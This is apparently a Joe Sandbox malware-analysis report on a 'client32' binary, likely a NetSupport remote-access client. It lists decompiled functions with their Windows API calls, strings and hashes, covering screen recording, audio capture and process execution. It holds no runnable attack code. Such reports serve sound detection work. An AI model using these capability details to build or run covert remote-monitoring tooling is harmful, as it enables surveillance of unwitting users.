                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Object$PropRemove$PaintRectSelect$BeginBrushClientCreateDeleteDrawFillLongSolidStockTextWindow
                                                        • String ID: NSMBmpClass WM_PAINT rcClt L=%d, T=%d, R=%d, B=%d, W=%d, H=%d$NSMBmpClass WM_PAINT rcNew L=%d, T=%d, R=%d, B=%d, W=%d, H=%d$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd$picholder w=%d, h=%d
                                                        • API String ID: 3417689559-267201724
                                                        • Opcode ID: 0f0fde7be0d9a163d168c234d32f8707ec11b46134b45822327dab59a907cea7
                                                        • Instruction ID: 4dbc0ed789370292590261d06177d4a80673600d05af41177adcb8a0809f0c2d
                                                        • Opcode Fuzzy Hash: 0f0fde7be0d9a163d168c234d32f8707ec11b46134b45822327dab59a907cea7
                                                        • Instruction Fuzzy Hash: 03611BB6E00619AFCB04CFA8CD84DEEF7B9FB88714F108559E915A7244EB74AD04CB61
                                                        Function 1101B3E0 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 173filelibrarycomCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000001,00000000), ref: 1101B3FE
                                                        • CloseHandle.KERNEL32(00000000), ref: 1101B42E
                                                        • LoadLibraryA.KERNEL32(PCIImage.dll), ref: 1101B450
                                                        • CloseHandle.KERNEL32(00000000), ref: 1101B472
                                                        • GetProcAddress.KERNEL32(00000000,DecompressPNGToBitmap), ref: 1101B489
                                                        • FreeLibrary.KERNEL32(00000000), ref: 1101B4A1
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 1101B4AA
                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 1101B4B5
                                                        • GlobalLock.KERNEL32(00000000), ref: 1101B4BE
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 1101B4CD
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 1101B4D4
                                                        • CloseHandle.KERNEL32(00000000), ref: 1101B4DB
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 1101B4EF
                                                        • OleLoadPicture.OLEAUT32(00000000,00000000,00000000,111AC60C,-0000001C), ref: 1101B513
                                                        • DeleteObject.GDI32(00000000), ref: 1101B53B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Global$CloseFileHandle$CreateLibraryLoad$AddressAllocDeleteFreeLockObjectPictureProcReadSizeStreamUnlock
                                                        • String ID: DecompressPNGToBitmap$PCIImage.dll
                                                        • API String ID: 2291646601-2375843702
                                                        • Opcode ID: cc2f3a6f886d93ff8ea9a700d807c02b635d1048fb06df1f0aa03edf9b03c29d
                                                        • Instruction ID: 62cfc7fa3e2055ec9800540563fbb578b27e0b4a6d2d587e1a7a746e2869ae39
                                                        • Opcode Fuzzy Hash: cc2f3a6f886d93ff8ea9a700d807c02b635d1048fb06df1f0aa03edf9b03c29d
                                                        • Instruction Fuzzy Hash: F351C076B40214AFE711EBA5DC88F9EBBACEB85724F04C165F906DB284DB74D901C7A0
                                                        Function 1112B230 Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 308COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SystemParametersInfoA.USER32(00000010,00000000,111DC1A0,00000000), ref: 1112B2C2
                                                        • SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 1112B2D5
                                                        • SHGetFolderPathA.SHFOLDER(00000000,00000010,00000000,00000000,00000000), ref: 1112B46D
                                                        • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1112B483
                                                        • CloseHandle.KERNEL32(00000000), ref: 1112B4CB
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 1112B613
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoParametersSystem$CloseDirectoryFolderHandlePathWindows__wcstoi64
                                                        • String ID: Client$PrefixName$RecordAudio$ReplayFiles$ReplayPath$Show$ShowRecord$ShowToWindow$UI: End Show$UI: Start Show$\Desktop
                                                        • API String ID: 3054845645-718119679
                                                        • Opcode ID: 1df17266715f8f6575590b0a9cae3b1e463cd38446d3aa05f64ad84cc8b593d1
                                                        • Instruction ID: 4a8e56dd47aa2ec122ad2e2a6e1493817fcda6923c0d3750c0c878d0569fa937
                                                        • Opcode Fuzzy Hash: 1df17266715f8f6575590b0a9cae3b1e463cd38446d3aa05f64ad84cc8b593d1
                                                        • Instruction Fuzzy Hash: B4B10874B41665BFEB14DB60CD85FDAF761BB44718F608128FE2A6B2C4DB706800CB99
                                                        Function 110035B0 Relevance: 27.2, APIs: 18, Instructions: 171COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSysColor.USER32(00000004), ref: 110035F1
                                                          • Part of subcall function 111319C0: SetBkColor.GDI32(?,00000000), ref: 111319D4
                                                          • Part of subcall function 111319C0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111319E9
                                                          • Part of subcall function 111319C0: SetBkColor.GDI32(?,00000000), ref: 111319F1
                                                        • CreateSolidBrush.GDI32(00000000), ref: 11003605
                                                        • GetStockObject.GDI32(00000007), ref: 11003610
                                                        • SelectObject.GDI32(?,00000000), ref: 1100361B
                                                        • SelectObject.GDI32(?,?), ref: 1100362C
                                                        • GetSysColor.USER32(00000010), ref: 1100363C
                                                        • GetSysColor.USER32(00000010), ref: 11003653
                                                        • GetSysColor.USER32(00000014), ref: 1100366A
                                                        • GetSysColor.USER32(00000014), ref: 11003681
                                                        • GetSysColor.USER32(00000014), ref: 1100369E
                                                        • GetSysColor.USER32(00000014), ref: 110036B5
                                                        • GetSysColor.USER32(00000010), ref: 110036CC
                                                        • GetSysColor.USER32(00000010), ref: 110036E3
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 11003700
                                                        • Rectangle.GDI32(?,?,00000001,?,?), ref: 1100371A
                                                        • SelectObject.GDI32(?,?), ref: 1100372E
                                                        • SelectObject.GDI32(?,?), ref: 11003738
                                                        • DeleteObject.GDI32(?), ref: 1100373E
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
                                                        • String ID:
                                                        • API String ID: 3698065672-0
                                                        • Opcode ID: 04c01b13460c93f31d2d2e389f35455b7ffd5bfe07828e99ddf090b4159d3ad7
                                                        • Instruction ID: 2bc938ab10bd54deed445a78db49907ee5b49920563a61e7829f7d323b0f7c60
                                                        • Opcode Fuzzy Hash: 04c01b13460c93f31d2d2e389f35455b7ffd5bfe07828e99ddf090b4159d3ad7
                                                        • Instruction Fuzzy Hash: A7514EB6900609AFD710DFA5CC85EBFF3BCEF98705F104A18EA1297285D670B9058BA1
                                                        Function 1108D7B0 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 225COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32 ref: 1108D831
                                                        • GetLastError.KERNEL32 ref: 1108D83B
                                                        • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 1108D859
                                                        • _malloc.LIBCMT ref: 1108D862
                                                        • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,00000000,00000000,00000000), ref: 1108D87C
                                                        • LookupAccountSidA.ADVAPI32(00000000,00000000,?,?,00000000,?,?), ref: 1108D8CA
                                                        • GetSidIdentifierAuthority.ADVAPI32(00000000), ref: 1108D8E3
                                                        • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 1108D8EA
                                                        • GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 1108D8F3
                                                        • GetTokenInformation.ADVAPI32(00000000,00000002,?,00002000,00000000), ref: 1108D931
                                                        • _malloc.LIBCMT ref: 1108D956
                                                        • GetTokenInformation.ADVAPI32(00000000,00000002,00000000,00001000,?), ref: 1108D974
                                                        • _free.LIBCMT ref: 1108DA92
                                                        • _free.LIBCMT ref: 1108DAA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InformationToken$Authority$_free_malloc$AccountCountErrorIdentifierLastLookup
                                                        • String ID: advapi
                                                        • API String ID: 2675550055-46682764
                                                        • Opcode ID: 8a6bad04d055ccb3fe64c309022b91352f399925ddcc069f7f55c1038f8a2839
                                                        • Instruction ID: e41896da37f67aad26cc8bb122dbe4d69e903b7b164305b4c007e48cc011dbc7
                                                        • Opcode Fuzzy Hash: 8a6bad04d055ccb3fe64c309022b91352f399925ddcc069f7f55c1038f8a2839
                                                        • Instruction Fuzzy Hash: F4813171D042299BEB11CF55CC88BDEB7F8AF49308F5041E9E949A7241E770AE94CFA1
                                                        Function 1100B310 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 190fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • _malloc.LIBCMT ref: 1100B366
                                                          • Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
                                                          • Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
                                                          • Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616
                                                          • Part of subcall function 1100AC40: EnterCriticalSection.KERNEL32(000000FF,82E0FB89,?,00000000,00000000), ref: 1100AC84
                                                          • Part of subcall function 1100AC40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACA2
                                                          • Part of subcall function 1100AC40: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ACF7
                                                          • Part of subcall function 1100AC40: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD37
                                                          • Part of subcall function 1100AC40: CloseHandle.KERNEL32(00000000), ref: 1100AD3E
                                                          • Part of subcall function 1100AC40: _free.LIBCMT ref: 1100AD53
                                                          • Part of subcall function 1100AC40: FreeLibrary.KERNEL32(?), ref: 1100AD6B
                                                          • Part of subcall function 1100AC40: LeaveCriticalSection.KERNEL32(?), ref: 1100AD75
                                                        • EnterCriticalSection.KERNEL32(1100CA5A,Audio,DisableSounds,00000000,00000000,82E0FB89,?,1100CA4A,00000000,?,1100CA4A,?), ref: 1100B39B
                                                        • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CA4A,?), ref: 1100B3B8
                                                        • _calloc.LIBCMT ref: 1100B3E9
                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CA4A,?), ref: 1100B40F
                                                        • LeaveCriticalSection.KERNEL32(1100CA5A,?,1100CA4A,?), ref: 1100B449
                                                        • LeaveCriticalSection.KERNEL32(1100CA4A,?,?,1100CA4A,?), ref: 1100B46E
                                                        Strings
                                                        • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B51C
                                                        • DisableSounds, xrefs: 1100B342
                                                        • \\.\NSAudioFilter, xrefs: 1100B3B0
                                                        • Audio, xrefs: 1100B347
                                                        • Vista new pAudioCap=%p, xrefs: 1100B4D3
                                                        • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4C3
                                                        • InitCaptureSounds NT6, xrefs: 1100B48E
                                                        • Vista AddAudioCapEvtListener(%p), xrefs: 1100B4F3
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                        • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                        • API String ID: 1843377891-2362500394
                                                        • Opcode ID: 84f6a34c3f9a23e85a815e55c0cb6dc8feb7e1515be3af9a6d3caf5416032c27
                                                        • Instruction ID: f6a869108093e80182554cf0a38d57943248311c262823834013d1bf8f3ce35d
                                                        • Opcode Fuzzy Hash: 84f6a34c3f9a23e85a815e55c0cb6dc8feb7e1515be3af9a6d3caf5416032c27
                                                        • Instruction Fuzzy Hash: 9151F7B5E04A46AFE704CF64DC80B9EFBA8FB45359F10467AE91993240EB31B550CBA1
                                                        Function 1112D7A0 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 248windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 1112D7BA
                                                        • GetDC.USER32(?), ref: 1112D7EC
                                                        • SelectObject.GDI32(00000000,?), ref: 1112D7FC
                                                        • GetTextExtentPoint32A.GDI32(00000000,?,00000000,00000002), ref: 1112D8A0
                                                        • SelectObject.GDI32(00000000,000003E8), ref: 1112D9A5
                                                        • ReleaseDC.USER32(?,00000000), ref: 1112D9CD
                                                        • SystemParametersInfoA.USER32(00000030,00000000,11182200,00000000), ref: 1112D9DD
                                                        • SetWindowPos.USER32(00000000,000000FF,-0000000F,-0000000F,-0000000A,-00000009,00000040,?,?,?,000003E8,00000002,TCP Retries), ref: 1112DA2F
                                                        • GetTextExtentPoint32A.GDI32(00000000,?,00000000,?), ref: 1112D906
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • SetTimer.USER32(?,00000001,00000000,00000000), ref: 1112DA67
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExtentObjectPoint32SelectTextWindow$ErrorExitInfoLastMessageParametersProcessReleaseSystemTimerVisiblewsprintf
                                                        • String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 1475044039-3129562787
                                                        • Opcode ID: 2609c171a1903106328200cf008d87556c1b9f029330b9767a5fea5ce1dccd09
                                                        • Instruction ID: 594014a1ddc5c7ee27caa9ffbdf23d2d6d19d72861e267c9d0e0215120db3a2f
                                                        • Opcode Fuzzy Hash: 2609c171a1903106328200cf008d87556c1b9f029330b9767a5fea5ce1dccd09
                                                        • Instruction Fuzzy Hash: EEA17AB9A00606AFCB15CF65D984E9EF7F1BF48314FA08568E959A7781E730B940CF60
                                                        Function 110F9620 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 110F964E
                                                        • EnterCriticalSection.KERNEL32(111DBDA4), ref: 110F9657
                                                        • GetTickCount.KERNEL32 ref: 110F965D
                                                        • GetTickCount.KERNEL32 ref: 110F96B0
                                                        • LeaveCriticalSection.KERNEL32(111DBDA4), ref: 110F96B9
                                                        • GetTickCount.KERNEL32 ref: 110F96EA
                                                        • LeaveCriticalSection.KERNEL32(111DBDA4), ref: 110F96F3
                                                        • EnterCriticalSection.KERNEL32(111DBDA4), ref: 110F971C
                                                        • LeaveCriticalSection.KERNEL32(111DBDA4,00000000,?,00000000), ref: 110F97E3
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                          • Part of subcall function 110E5C50: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,110F9787,?), ref: 110E5C7B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
                                                        • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1201\1201f2\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                        • API String ID: 1574099134-2778890452
                                                        • Opcode ID: f5f3269683871b0c87e91eafc9f17311406ea81333dff44d105f7e04005244ec
                                                        • Instruction ID: b4577e42a59a3743beb29bf4ff123ba11c5e9efe7befee2d7f5d2ccaaf1aa78d
                                                        • Opcode Fuzzy Hash: f5f3269683871b0c87e91eafc9f17311406ea81333dff44d105f7e04005244ec
                                                        • Instruction Fuzzy Hash: A241D676E013266FDB00DFA5ED85ADEFBA4BB5565CF004535F916E7200F6306904CBA2
                                                        Function 110457B0 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 137processwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 11045836
                                                        • WinExec.KERNEL32(?,00000001), ref: 110458AF
                                                        • CloseHandle.KERNEL32(?), ref: 110458D1
                                                        • CloseHandle.KERNEL32(?), ref: 110458DA
                                                        • IsWindow.USER32(00000000), ref: 110458EC
                                                        • GetLastError.KERNEL32 ref: 11045917
                                                        • IsWindow.USER32(00000000), ref: 11045949
                                                        • PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1104595A
                                                          • Part of subcall function 11133F90: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11182A50), ref: 11133FFD
                                                          • Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110291B), ref: 1113403E
                                                          • Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113409B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
